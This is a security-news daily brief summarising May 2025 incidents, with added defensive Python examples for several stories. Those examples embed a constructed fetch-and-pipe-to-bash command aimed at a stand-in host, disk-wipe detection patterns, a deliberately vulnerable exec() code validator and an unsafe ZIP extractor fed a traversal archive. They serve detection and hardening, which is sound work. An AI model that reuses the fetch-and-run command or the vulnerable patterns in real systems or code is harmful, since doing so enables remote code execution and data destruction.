Daily Brief

Articles are listed below; each headline is followed by a generated summary.

Total articles found: 11826

Checks for new stories every ~15 minutes

Title Summary
2025-05-06 11:10:59 thehackernews MISCELLANEOUS Microsoft Highlights Security Risks in Kubernetes Deployments
Microsoft has warned that default Helm charts are a recurring source of security weaknesses in Kubernetes deployments. Helm charts simplify deploying applications on Kubernetes, but their default settings often prioritize convenience over security, producing misconfigurations that can expose sensitive data, cloud resources, or entire environments to attack. The main weaknesses are services exposed to the internet without adequate network controls and workloads deployed without authentication or authorization. Microsoft's research team advises reviewing and adjusting Helm chart values and YAML manifests against security best practices, scanning publicly exposed interfaces regularly, and monitoring container activity continuously to detect and contain threats. The issue matters because many compromises of containerized applications start from these insecure default configurations.
2025-05-06 10:04:58 thehackernews MISCELLANEOUS Essential Strategies for Backing Up Microsoft Entra ID
Microsoft Entra ID is central to business identity management and a heavy target, with Microsoft counting more than 600 million identity attacks per day. Despite built-in protections such as multifactor authentication and conditional access, gaps remain in Entra ID's native security, and companies hit by breaches suffer downtime, failed audits, and reputational damage. Under Microsoft's shared responsibility model, backing up directory data is the customer's job, which makes a dedicated backup strategy essential. Limitations of the native recovery tools, such as the Recycle Bin's short retention period, underscore the need for a proper backup solution. An effective strategy should match the organization's risk profile, balancing protection needs against cost and available resources; a tailored approach improves resilience so the business can recover quickly and keep operating. The article presents Veeam Data Cloud as a way to cover the limits of native Entra ID protection.
2025-05-06 09:15:03 bleepingcomputer MALWARE Linux Servers Targeted by Wiper Malware in Supply-Chain Attack
Researchers identified a supply-chain attack that used malicious Go modules hosted on GitHub to target Linux servers. The malware, spread across three Go modules, fetches and runs a disk-wiping script that causes irreversible data loss and leaves the system unusable. The destructive payload, a Bash script named done.sh, uses dd to overwrite the primary Linux storage volume, /dev/sda. The loader checks that it is running on Linux before executing, so only Linux hosts are affected. The obfuscated code inside the modules retrieves the remote wiper script and executes it immediately, leaving almost no time to respond. The malicious modules impersonated legitimate projects, raising the odds that developers would pull them into their applications. Because Go resolves modules straight from source repositories with no central vetting of publishers, such packages are easy to distribute. GitHub has since removed the identified modules.
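The loader pattern described above (Linux check, a command hidden as an integer-array literal, shell execution) is the kind of thing a dependency audit should surface. The script below is an added example, not code from the researchers' report or from the malicious modules: it decodes Go `[]byte{...}` and `[]rune{...}` literals back into text and looks for fetch-and-execute and disk-wipe indicators. The Go snippet it scans is constructed to imitate the described loader, the indicator list and the verdict rule are our own, and `done.sh` itself is not reproduced.

```python
"""Added example (not from the researchers' report nor from the malicious
modules): surface strings hidden in Go source as integer-array literals, then
look for the remote-fetch-and-execute and disk-wipe indicators described above.

Assumptions (ours): the Go snippet below is constructed to imitate the described
loader (Linux check, obfuscated command, shell execution); the indicator list and
the verdict rule are our choice, not the report's detection logic.
"""
import re
from typing import Dict, List

# Constructed sample. The command is hidden as a []byte literal, the way string
# obfuscation in a module keeps a plain "wget ... | bash" out of the source.
_HIDDEN_CMD = "wget -O - https://example.invalid/done.sh | /bin/bash"
SUSPICIOUS_GO = f"""package sample

import (
    "os/exec"
    "runtime"
)

func init() {{
    if runtime.GOOS != "linux" {{
        return
    }}
    c := string([]byte{{{', '.join(str(b) for b in _HIDDEN_CMD.encode())}}})
    _ = exec.Command("/bin/sh", "-c", c).Start()
}}
"""

BENIGN_GO = """package sample

import "strings"

func Normalize(s string) string { return strings.TrimSpace(s) }
"""

# Substrings worth a second look in any dependency's source.
INDICATORS = ("wget ", "curl ", "| bash", "| sh", "/bin/bash", "/bin/sh",
              "dd if=", "of=/dev/", "/dev/sda", "mkfs.")

_INT_ARRAY = re.compile(r"\[\](?:byte|rune)\s*\{([^}]*)\}")
_GO_STRING = re.compile(r'"((?:[^"\\\n]|\\.)*)"|`([^`]*)`')


def decode_int_arrays(src: str) -> List[str]:
    """Turn []byte{119, 103, ...} / []rune{...} literals back into text."""
    out = []
    for body in _INT_ARRAY.findall(src):
        chars = []
        for tok in re.findall(r"0[xX][0-9a-fA-F]+|\d+", body):
            try:
                n = int(tok, 0)
            except ValueError:
                continue
            if 0 < n < 0x110000:
                chars.append(chr(n))
        if chars:
            out.append("".join(chars))
    return out


def scan_go_source(src: str) -> Dict[str, object]:
    """Collect plain and hidden strings, then match indicators."""
    plain = [a or b for a, b in _GO_STRING.findall(src)]
    hidden = decode_int_arrays(src)
    haystack = plain + hidden
    hits = sorted({ind for ind in INDICATORS for s in haystack if ind in s})
    uses_exec = '"os/exec"' in src
    return {
        "hidden_strings": hidden,
        "indicators": hits,
        "os_guard": "runtime.GOOS" in src,
        "uses_exec": uses_exec,
        # Hidden strings plus os/exec plus a fetch/shell indicator is the described pattern.
        "verdict": "suspicious" if (hidden and hits and uses_exec) else "clean",
    }


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_GO), ("benign", BENIGN_GO)):
        r = scan_go_source(src)
        print(f"{label}: verdict={r['verdict']} indicators={r['indicators']} "
              f"hidden={r['hidden_strings']}")
```

Run it over a vendored module cache (for example every `.go` file under `$GOMODCACHE`) before trusting a new dependency; the point is that a Linux-only guard plus `os/exec` plus a string that only exists once decoded is the signature to hunt for, not any particular module name.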
2025-05-06 05:51:57 thehackernews MALWARE Google Patches Android Vulnerability Exploited in the Wild
Google's May 2025 Android security update fixes 46 vulnerabilities, including one that was already being exploited. CVE-2025-27363, a high-severity flaw in the System component, allows local code execution with no additional privileges required. It stems from an out-of-bounds write in the FreeType font-rendering library when parsing TrueType GX and variable font files. Facebook disclosed the bug in March 2025, and Google says there are indications it is under limited, targeted exploitation. FreeType versions above 2.13.0 contain the fix. The update also addresses further issues in the Android System and Framework components that could lead to privilege escalation, information disclosure, and denial of service. Google notes that security improvements in newer Android versions make exploitation harder and urges users to install the update.
2025-05-06 04:30:53 thehackernews MALWARE Critical Flaw in Langflow Added to CISA KEV for Active Exploits
A critical flaw in the Langflow platform, CVE-2025-3248, has been added to CISA's Known Exploited Vulnerabilities catalog on evidence of active exploitation. Rated CVSS 9.8, it lets remote, unauthenticated attackers execute arbitrary code through the /api/v1/validate/code endpoint, which passes submitted Python to exec() without authentication or sandboxing, so an attacker gets command execution on the server. The bug affects most earlier versions; the fix shipped in version 1.3.0 on March 31, 2025. Horizon3.ai researchers discovered and reported it, describing it as "easily exploitable" and able to give full control of the server. A public proof-of-concept appeared on April 9, 2025, raising the urgency of patching. More than 400 internet-exposed Langflow instances have been identified, mostly in the US, Germany, Singapore, India, and China. CISA requires Federal Civilian Executive Branch agencies to patch by May 26, 2025.
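The root cause described above, a "validate code" handler that runs the submission, is worth seeing next to its fix. The block below is an added example and is not Langflow's code: the handler signatures, the token check and the sample submission are constructed for illustration, and Langflow's real endpoint and patch are not reproduced. It shows why exec() is not validation (a default-argument expression runs the moment the `def` executes, with nothing ever called) and that `ast.parse` checks syntax without evaluating anything.

```python
"""Added example (not Langflow's code): the pattern behind the flaw described
above, an unauthenticated "validate code" handler that runs the submitted code,
beside a hardened version that checks syntax without executing anything.

Assumptions (ours): the handler signatures, the token check and the sample
submission are constructed for illustration; Langflow's real endpoint and fix
are not reproduced here.
"""
import ast
from typing import Dict, Iterable, Optional

# Stands in for "side effects on the server": anything written here proves that
# submitted code actually ran.
EXECUTED: Dict[str, object] = {}

# Constructed submission. Nothing is called: the default-argument expression is
# evaluated when the def statement executes, which is all exec() needs.
SUBMISSION = '''
def component(payload=EXECUTED.__setitem__("ran", True)):
    return payload
'''


def validate_code_unsafe(code: str) -> Dict[str, object]:
    """Vulnerable pattern: no caller identity, and exec() runs the code to
    'validate' it. Decorators, default arguments and module-level statements
    all execute, so this is remote code execution as the service account."""
    try:
        exec(code, {"EXECUTED": EXECUTED})  # RCE sink
        return {"valid": True}
    except Exception as exc:  # syntax or runtime error in the submission
        return {"valid": False, "error": str(exc)}


def validate_code_safe(code: str, token: Optional[str],
                       valid_tokens: Iterable[str]) -> Dict[str, object]:
    """Hardened: authenticate first, then parse only. ast.parse builds a syntax
    tree and never evaluates the code, so the submission cannot run anything."""
    if token is None or token not in set(valid_tokens):
        raise PermissionError("authentication required")
    try:
        tree = ast.parse(code)
    except SyntaxError as exc:
        return {"valid": False, "error": f"line {exc.lineno}: {exc.msg}"}
    functions = [node.name for node in ast.walk(tree)
                 if isinstance(node, ast.FunctionDef)]
    return {"valid": True, "functions": functions}


if __name__ == "__main__":
    print("safe:", validate_code_safe(SUBMISSION, "t0k3n", ["t0k3n"]),
          "ran?", "ran" in EXECUTED)
    print("unsafe:", validate_code_unsafe(SUBMISSION), "ran?", "ran" in EXECUTED)
```

If a product genuinely needs to execute user code (for example to introspect a component), the execution belongs in an authenticated path inside a sandboxed, resource-limited worker, never in a "validate" endpoint reachable without credentials.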
2025-05-06 00:22:25 theregister NATION STATE ACTIVITY Trump Proposes Major Budget Cut to Cybersecurity Agency, CISA
President Trump's 2026 budget proposal recommends a $491 million cut for the Cybersecurity and Infrastructure Security Agency (CISA), a 17% reduction from its current funding. The cut reflects Trump's criticism of CISA's work on countering online misinformation and on election security, which he calls the "censorship industrial complex." While CISA would shrink, the Department of Homeland Security overall would receive a large increase, earmarked for border security and immigration enforcement. The proposal accuses CISA of violating free speech by policing misinformation and of self-promotion at the expense of protecting critical infrastructure; it also trims other agencies, including TSA and FEMA, citing political bias and inefficiency. Trump's long-running challenge to the legitimacy of his 2020 election loss shapes his stance toward CISA. The proposal is contentious and expected to face substantial opposition in Congress, particularly over the cuts to cybersecurity funding.
2025-05-05 22:26:21 bleepingcomputer CYBERCRIME Luna Moth Hackers Mimic IT Help Desks to Target U.S. Firms
Luna Moth, also known as Silent Ransom Group, has stepped up data-theft and extortion attacks on US legal and financial firms. The group uses callback phishing and social engineering to gain remote access and steal data, without deploying ransomware. It registers domains through GoDaddy that impersonate the IT support desks of major US law and financial firms. Victims receive emails containing a fake helpdesk number; when they call, they are talked into installing remote monitoring and management (RMM) software that gives the attackers direct access to their systems. The tools abused are legitimate RMM products such as Syncro, SuperOps, Zoho Assist, Atera, AnyDesk, and Splashtop, which security products are less likely to flag. With a foothold, the attackers move through the network, find and exfiltrate valuable data, and threaten to publish it unless a ransom is paid. EclecticIQ's report recommends adding the published indicators of compromise to blocklists and restricting the use of unapproved RMM tools.
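The "restrict unapproved RMM tools" advice above becomes a concrete detection once you look at process-creation telemetry. The script below is an added example, not EclecticIQ's detection content: the event records are constructed to resemble an EDR export, the product keywords come from the tool names in the report, but the file names, the approved-tool allowlist and the parent-process heuristic (a browser or mail client as parent means the user launched it, typically while still on the phone with the "helpdesk") are illustrative. In production, key the allowlist on code-signing identity or hashes rather than names.

```python
"""Added example (not EclecticIQ's detection content): flag process-creation
events that show an unapproved remote-management tool starting on a workstation,
the post-call step of the callback-phishing flow described above.

Assumptions (ours): the event records are constructed to resemble an EDR export;
the product keywords come from the tool names in the report, but the file names,
the approved-tool list and the parent-process heuristic are illustrative.
"""
from typing import Dict, Iterable, List

# Product-name keywords for the RMM families named in the report.
RMM_KEYWORDS = ("syncro", "superops", "zoho", "atera", "anydesk", "splashtop")
# Parents that mean a user launched it from mail or a browser.
USER_LAUNCH_PARENTS = {"outlook.exe", "chrome.exe", "msedge.exe",
                       "firefox.exe", "explorer.exe"}
# Where the organisation's sanctioned RMM agent lives (assumption).
APPROVED_PATH_PREFIXES = ("c:\\program files\\approvedrmm\\",)

# Constructed sample of process-creation events.
EVENTS: List[Dict[str, str]] = [
    {"ts": "2025-05-05T14:02:11Z", "host": "WS-0142", "user": "jdoe",
     "image": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "parent": "msedge.exe"},
    {"ts": "2025-05-05T14:05:40Z", "host": "WS-0142", "user": "jdoe",
     "image": r"C:\Program Files\ApprovedRMM\agent.exe", "parent": "services.exe"},
    {"ts": "2025-05-05T15:17:03Z", "host": "WS-0207", "user": "asmith",
     "image": r"C:\Users\asmith\AppData\Local\Temp\ZohoAssist-Setup.exe",
     "parent": "explorer.exe"},
    {"ts": "2025-05-05T15:20:55Z", "host": "WS-0207", "user": "asmith",
     "image": r"C:\Windows\System32\notepad.exe", "parent": "explorer.exe"},
    {"ts": "2025-05-05T16:01:12Z", "host": "SRV-IT01", "user": "svc_rmm",
     "image": r"C:\Program Files\Splashtop\streamer.exe", "parent": "services.exe"},
]


def classify(event: Dict[str, str],
             approved_prefixes: Iterable[str] = APPROVED_PATH_PREFIXES) -> Dict[str, str]:
    """Return a finding, or {} if the event is not an unapproved RMM start."""
    image = event["image"].lower()
    if image.startswith(tuple(p.lower() for p in approved_prefixes)):
        return {}
    family = next((k for k in RMM_KEYWORDS if k in image), None)
    if family is None:
        return {}
    user_launched = event["parent"].lower() in USER_LAUNCH_PARENTS
    in_user_profile = "\\users\\" in image
    # Interactive launch from a user profile is the callback-phishing shape.
    severity = "high" if (user_launched and in_user_profile) else "medium"
    reason = ("unapproved RMM launched interactively from the user profile"
              if severity == "high" else "unapproved RMM present")
    return {"ts": event["ts"], "host": event["host"], "user": event["user"],
            "family": family, "severity": severity, "reason": reason}


def detect(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Findings in event order; empty list means nothing to act on."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']}: [{f['severity']}] "
              f"{f['family']} - {f['reason']}")
```

The medium-severity hit on the server is the kind of result an allowlist review should resolve: either the tool is sanctioned and its install path belongs in the approved list, or it should not be there at all.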
2025-05-05 21:00:20 theregister DATA BREACH Unsecure Clone of Signal App Compromises US Government Data
An unknown attacker gained access to US government communications through TeleMessage, a modified Signal client used by Michael Waltz. TeleMessage, acquired by Smarsh in 2024, has temporarily suspended its services following the incident, and an external cybersecurity firm is supporting the investigation. The exposed material reportedly includes archived messages, potentially held without encryption, touching on US Customs and Border Protection matters and financial transactions. The app's use came to light through a photo of Waltz using it; it archives messages to a server, which puts the archive copy outside Signal's end-to-end encryption unless it is separately protected. Journalists who examined the app's source code also found hard-coded credentials, pointing to serious security flaws. The incident raises questions about whether the app complies with Signal's open source license, and more broadly about secure-communication practices in government and their consequences for national security.
2025-05-05 20:30:13 bleepingcomputer MALWARE New EDR Bypass Technique Exploited in Ransomware Attacks
A new EDR bypass, dubbed "Bring Your Own Installer," has been seen in an attack that deployed Babuk ransomware. The technique, uncovered by Aon's Stroz Friedberg Incident Response team during a forensic investigation of a client network after a ransomware breach, abuses the SentinelOne agent upgrade process: a window during the upgrade lets an attacker leave the host without a running agent and therefore unprotected. Stroz Friedberg confirmed the bypass works across multiple versions of the SentinelOne agent. After being notified, SentinelOne shared mitigation steps with its customers and with other major EDR vendors, and advises enabling the "Online Authorization" (local upgrade authorization) setting, which requires approval from the management console before a local installer can upgrade, downgrade, or remove the agent.
2025-05-05 19:25:38 bleepingcomputer MISCELLANEOUS Microsoft Reports Risks in Kubernetes Deployments' Default Settings
Microsoft has highlighted security risks in default Kubernetes Helm charts that can expose sensitive data. Helm charts streamline application deployment on Kubernetes but often ship with weak defaults, including lax authentication and exposed ports, and without adjustment those defaults leave applications open to scanning and exploitation. The Microsoft Defender for Cloud Research report calls insecure default Helm chart configurations a significant threat to Kubernetes workloads and cites three cases illustrating the scope of the problem across different charts. Microsoft advises manually reviewing and hardening YAML manifests and Helm charts before deployment, scanning regularly for configuration errors, and monitoring container environments for unusual activity.
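Both Helm items in this brief (the thehackernews and bleepingcomputer write-ups of Microsoft's report) come down to the same advice: review what a chart actually renders before deploying it. The script below is an added example, not code from Microsoft's report or from any chart: it audits rendered manifests for the specific defaults the report calls out (services exposed outside the cluster, authentication switched off, privileged or root containers, no NetworkPolicy). The two sample releases are constructed and given as already-parsed dicts so the script runs with the standard library; in practice you would feed it `helm template <release> <chart>` parsed with `yaml.safe_load_all()`. The check names, the `AUTH`-variable heuristic and the sample chart are assumptions.

```python
"""Added example (not Microsoft's report code nor any chart's templates): audit
rendered Kubernetes manifests for the convenience-over-security defaults the
report describes.

Assumptions (ours, not from the article): the checks, their wording and the two
sample releases below are constructed. Real input would come from
`helm template <release> <chart>` parsed with yaml.safe_load_all(); the samples
are given as already-parsed dicts so the script runs with the standard library.
"""
from typing import Any, Dict, List, Optional

EXPOSING_SERVICE_TYPES = {"LoadBalancer", "NodePort"}
# Heuristic: an env var with AUTH in its name set to one of these looks like auth off.
AUTH_OFF_VALUES = {"false", "0", "no", "none", "disabled", "off"}
WORKLOAD_KINDS = {"Deployment", "StatefulSet", "DaemonSet", "Job"}

# Constructed: what a chart with convenience-first defaults might render.
INSECURE_RELEASE: List[Dict[str, Any]] = [
    {"apiVersion": "v1", "kind": "Service", "metadata": {"name": "dash"},
     "spec": {"type": "LoadBalancer", "selector": {"app": "dash"},
              "ports": [{"port": 80, "targetPort": 8080}]}},
    {"apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "dash"},
     "spec": {"template": {"spec": {
         "hostNetwork": True,
         "containers": [{
             "name": "dash", "image": "example/dash:1.0",
             "env": [{"name": "DASH_AUTH_ENABLED", "value": "false"}],
             "securityContext": {"privileged": True}}]}}}},
]

# Constructed: the same release after overriding the chart's values.
HARDENED_RELEASE: List[Dict[str, Any]] = [
    {"apiVersion": "v1", "kind": "Service", "metadata": {"name": "dash"},
     "spec": {"type": "ClusterIP", "selector": {"app": "dash"},
              "ports": [{"port": 80, "targetPort": 8080}]}},
    {"apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "dash"},
     "spec": {"template": {"spec": {
         "securityContext": {"runAsNonRoot": True},
         "containers": [{
             "name": "dash", "image": "example/dash:1.0",
             "env": [{"name": "DASH_AUTH_ENABLED", "value": "true"}],
             "securityContext": {"allowPrivilegeEscalation": False}}]}}}},
    {"apiVersion": "networking.k8s.io/v1", "kind": "NetworkPolicy",
     "metadata": {"name": "dash"},
     "spec": {"podSelector": {"matchLabels": {"app": "dash"}},
              "policyTypes": ["Ingress"],
              "ingress": [{"from": [{"podSelector": {"matchLabels": {"role": "ingress"}}}]}]}},
]


def _pod_spec(doc: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Return the pod spec embedded in a workload object, if any."""
    kind, spec = doc.get("kind"), doc.get("spec", {})
    if kind == "Pod":
        return spec
    if kind in WORKLOAD_KINDS:
        return spec.get("template", {}).get("spec", {})
    if kind == "CronJob":
        return (spec.get("jobTemplate", {}).get("spec", {})
                .get("template", {}).get("spec", {}))
    return None


def audit(docs: List[Dict[str, Any]]) -> List[str]:
    """Return one finding per risky default; an empty list means clean."""
    findings: List[str] = []
    has_netpol = False
    for doc in docs:
        kind = doc.get("kind")
        ident = f"{kind}/{doc.get('metadata', {}).get('name', '?')}"
        if kind == "NetworkPolicy":
            has_netpol = True
        if kind == "Service":
            svc_type = doc.get("spec", {}).get("type", "ClusterIP")
            if svc_type in EXPOSING_SERVICE_TYPES:
                findings.append(f"{ident}: type {svc_type} exposes the workload outside the cluster")
        pod = _pod_spec(doc)
        if pod is None:
            continue
        if pod.get("hostNetwork"):
            findings.append(f"{ident}: hostNetwork=true shares the node's network namespace")
        pod_sc = pod.get("securityContext", {})
        for c in pod.get("containers", []) + pod.get("initContainers", []):
            cid = f"{ident} container {c.get('name', '?')}"
            sc = c.get("securityContext", {})
            if sc.get("privileged"):
                findings.append(f"{cid}: privileged=true grants full access to the node")
            if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):
                findings.append(f"{cid}: runAsNonRoot not set, container may run as root")
            for env in c.get("env", []):
                name, value = env.get("name", ""), str(env.get("value", "")).lower()
                if "AUTH" in name.upper() and value in AUTH_OFF_VALUES:
                    findings.append(f"{cid}: env {name}={env.get('value')} looks like authentication disabled")
    if not has_netpol:
        findings.append("release: no NetworkPolicy rendered, so any pod in the cluster can reach these workloads")
    return findings


if __name__ == "__main__":
    for label, release in (("insecure", INSECURE_RELEASE), ("hardened", HARDENED_RELEASE)):
        result = audit(release)
        print(f"== {label}: {len(result)} finding(s)")
        for f in result:
            print("  -", f)
```

The hardened release changes only chart values (service type, `runAsNonRoot`, the auth flag) and adds a NetworkPolicy; none of that requires touching the chart itself, which is the point of the report's "review before you deploy" advice.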
2025-05-05 19:16:16 bleepingcomputer CYBERCRIME Darcula PhaaS Scheme Steals Nearly 900,000 Credit Cards Globally
The Darcula phishing-as-a-service (PhaaS) platform enabled the theft of 884,000 credit cards from 13 million clicks on malicious text messages over seven months between 2023 and 2024. Researchers from several organizations, including Norwegian broadcaster NRK and security firm Mnemonic, uncovered the operation, which spanned more than 100 countries and used 20,000 domains impersonating major brands. Darcula's texts typically pose as road-toll fines or package-delivery notices and lure victims into entering credentials and card details on spoofed sites. The platform sends lures over RCS and iMessage as well as SMS, which makes the phishing more effective. Recent upgrades let criminals auto-generate phishing kits for any brand, add stealth features, convert stolen card details into virtual cards, and use a simplified admin panel; by April 2025 Darcula had also integrated generative AI so operators can build custom scams in any language with LLM tools. The investigation identified the "Magic Cat" toolkit behind the operation, traced it to a Chinese individual, and documented lavish spending funded by the scheme. All findings were shared with law enforcement, including details of large-scale SIM farms and the setups used to process stolen cards.
2025-05-05 19:16:16 bleepingcomputer DATA BREACH Unofficial Signal Tool Hacked, US Government Data Potentially Exposed
TeleMessage, an Israeli company, has suspended its services after a potential breach of its TM SGNL tool, which archives messages from apps such as Signal. A hacker claimed to have breached TeleMessage's systems and accessed data; messages of Trump administration officials were reportedly not among the captured material, but the data may include government officials' contact details, some message contents, and back-end credentials. Screenshots from the breach show references to US Customs and Border Protection and to financial institutions. Experts who analyzed the source code of the modified app, TM SGNL, found multiple weaknesses. A Signal spokesperson stressed that the company cannot guarantee the security of unofficial versions of its app. Smarsh, the parent company, has engaged a cybersecurity firm to investigate and has promised transparency and updates.
2025-05-05 17:32:07 bleepingcomputer CYBERCRIME Darcula PhaaS Platform's Massive Credit Card Theft Exposed
The Darcula phishing-as-a-service platform stole 884,000 credit cards through SMS phishing, from 13 million clicks on phishing links worldwide. Over seven months its operators used 20,000 domains to spoof reputable brands, targeting Android and iPhone users in more than 100 countries. Darcula now delivers lures over RCS and iMessage as well as SMS, making its phishing more effective. New features let criminals automatically generate phishing kits for any brand and use generative AI to produce more convincing, language-specific scams. Mnemonic researchers reverse-engineered the Darcula infrastructure, uncovered the "Magic Cat" toolkit, and infiltrated the associated Telegram groups. Digital footprints led to a Chinese individual believed to be the creator; despite denials from the company linked to him, activity observed since suggests the operation continues. All findings have been shared with law enforcement to help dismantle the operation.
2025-05-05 17:11:26 thehackernews MALWARE Critical AirPlay Flaws Expose Apple Devices to Remote Attacks
Researchers disclosed critical vulnerabilities in Apple's AirPlay protocol that could give attackers remote control of devices. The flaws, collectively named AirBorne, affect Apple devices and third-party devices built on the AirPlay SDK. Some of them, such as CVE-2025-24252 and CVE-2025-24132, allow zero-click remote code execution that is wormable, so malware could hop between vulnerable devices on the same local network. An attacker could use them to plant ransomware or backdoors, threatening user data. Devices joined to public Wi-Fi are at particular risk, and a compromised device can carry the threat into an enterprise network when it later connects there. Apple has patched all identified vulnerabilities in its recent AirPlay and CarPlay updates; organizations should update all susceptible devices immediately and urge employees to update their personal devices as well.
2025-05-05 16:05:22 thehackernews CYBERCRIME CISA Adds High-Risk Commvault Vulnerability to KEV Catalog
CISA has added a severe Commvault vulnerability to its Known Exploited Vulnerabilities catalog. CVE-2025-34028, with a CVSS score of 10.0, is a path traversal flaw in Commvault Command Center versions 11.38.0 through 11.38.19 that allows code execution via a malicious ZIP file; it was discovered and reported by watchTowr Labs. Commvault fixed it in versions 11.38.20 and 11.38.25. This is the second Commvault flaw recently confirmed as actively exploited; the earlier one, CVE-2025-3928 in the Commvault Web Server, let remote, authenticated attackers create and execute web shells. Federal Civilian Executive Branch agencies must apply the patches by May 23, 2025. Commvault has said it found no unauthorized access to customer backup data in connection with the exploitation.
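The bug class above, path traversal through the member names of an uploaded ZIP, is easy to reproduce and easy to fix, and the fix is worth seeing next to the bug. The block below is an added example and is not Commvault's code or watchTowr's exploit: it shows a hand-rolled extractor that trusts member names beside one that resolves every member path and rejects anything that lands outside the destination. The archive contents, directory layout and helper names are constructed, and the Commvault endpoint and its patched logic are not reproduced.

```python
"""Added example (not Commvault's code nor watchTowr's exploit): the ZIP path
traversal pattern described above, shown as a hand-rolled extractor that trusts
member names beside one that rejects any member resolving outside the target
directory.

Assumptions (ours): the archive contents, directory layout and helper names are
constructed; the Commvault endpoint and its patched logic are not reproduced.
"""
import io
import os
import tempfile
import zipfile
from typing import Dict, List


def make_zip(members: Dict[str, bytes]) -> bytes:
    """Build an archive in memory; member names are written verbatim, so a
    '../' prefix survives exactly as an attacker would craft it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def unsafe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Vulnerable pattern: join the member name onto dest and write. normpath
    tidies the path but happily walks out of dest via '..'."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.normpath(os.path.join(dest, info.filename))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(info))
            written.append(target)
    return written


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Hardened: validate every member before writing any, and require the
    resolved path to stay under the resolved destination (realpath also
    defeats symlinked directories already present under dest)."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        plan = []
        for info in zf.infolist():
            name = info.filename
            if "\x00" in name or name.startswith(("/", "\\")) or os.path.isabs(name):
                raise ValueError(f"rejected absolute member {name!r}")
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"rejected traversal member {name!r}")
            plan.append((info, target))
        written = []
        for info, target in plan:  # only reached if every member passed
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(info))
            written.append(target)
    return written


def demo() -> Dict[str, object]:
    """Run both extractors against a traversal archive in a throwaway tree."""
    evil = make_zip({"../../dropped.jsp": b"<% /* constructed payload */ %>",
                     "ok.txt": b"hello"})
    clean = make_zip({"ok.txt": b"hello"})
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "a", "b", "webroot")
        os.makedirs(dest)
        unsafe_extract(evil, dest)
        escaped = os.path.exists(os.path.join(tmp, "a", "dropped.jsp"))
        try:
            safe_extract(evil, dest)
            rejected = False
        except ValueError:
            rejected = True
        try:
            safe_extract(make_zip({"/etc/passwd": b""}), dest)
            abs_rejected = False
        except ValueError:
            abs_rejected = True
        safe_written = safe_extract(clean, dest)
    return {"unsafe_escaped": escaped, "safe_rejected": rejected,
            "abs_rejected": abs_rejected, "safe_written": len(safe_written)}


if __name__ == "__main__":
    print(demo())
```

Two design points matter here: validation runs over the whole archive before anything is written, so a rejected archive leaves no partial extraction behind, and the containment test compares `realpath` results, which is what catches a member that traverses through a symlink rather than through a literal `..`.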